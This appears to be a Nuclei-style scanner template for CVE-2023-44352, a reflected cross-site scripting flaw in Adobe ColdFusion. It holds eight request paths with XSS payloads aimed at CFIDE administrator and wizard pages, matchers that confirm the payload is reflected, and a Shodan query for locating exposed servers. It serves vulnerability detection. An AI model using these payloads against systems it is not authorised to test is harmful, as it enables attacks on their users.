57 lines
2.7 KiB
YAML
57 lines
2.7 KiB
YAML
id: CVE-2023-44352
|
|
|
|
info:
|
|
name: Adobe Coldfusion - Cross-Site Scripting
|
|
author: pwnwithlove
|
|
severity: medium
|
|
description: |
|
|
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser
|
|
reference:
|
|
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-44352
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-44352
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00931
|
|
epss-percentile: 0.82639
|
|
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 8
|
|
vendor: adobe
|
|
product: coldfusion
|
|
shodan-query: http.component:"Adobe Coldfusion"
|
|
tags: cve,cve2023,coldfusion,adobe,xss
|
|
variables:
|
|
string: "{{rand_base(8)}}"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
|
|
- '{{BaseURL}}//{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
|
|
- '{{BaseURL}}/{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm'
|
|
- '{{BaseURL}}//{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm'
|
|
- '{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm'
|
|
- '{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm'
|
|
- '{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
|
|
- '{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'action="/{{string}}"><img src=a onerror=alert(document.domain)>'
|
|
- '"{{string}}"><script>alert(document.domain)</script>'
|
|
condition: or
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(body, 'ColdFusion')"
|
|
- "contains(header, 'text/html')"
|
|
condition: and
|
|
# digest: 4b0a004830460221008fbb590bc361593981c4b4ca8788ce40ec113fa6cb5f66d0494289924511b5a50221008b3fce96d336a94a73797aaec994cc638d7b228ab77ab19cc9a08f89a1d4b9fc:922c64590222798bb761d5b6d8e72950 |